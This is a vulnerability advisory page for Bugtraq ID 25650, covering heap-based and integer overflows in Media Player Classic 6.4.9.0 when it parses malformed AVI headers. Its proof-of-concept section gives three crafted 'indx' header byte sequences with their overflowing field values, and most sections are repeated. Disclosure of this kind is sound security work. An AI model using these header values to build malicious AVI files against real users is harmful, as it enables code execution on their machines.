Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
BID:25650
Info
Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
| Bugtraq ID: | 25650 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2007-4940 CVE-2007-4939 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2007 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Code Audit Labs is credited with the discovery of this issue. |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.
An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.
Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.
An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.
Exploit / POC
Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting user to open a maliciously crafted AVI file.
The following examples of AVI header data are available:
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
To exploit these issues, an attacker must entice an unsuspecting user to open a maliciously crafted AVI file.
The following examples of AVI header data are available:
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
Solution / Fix
Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
References:
References:
- Media Player Classic Homepage (guliverkli)
- CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability (Code Audit Labs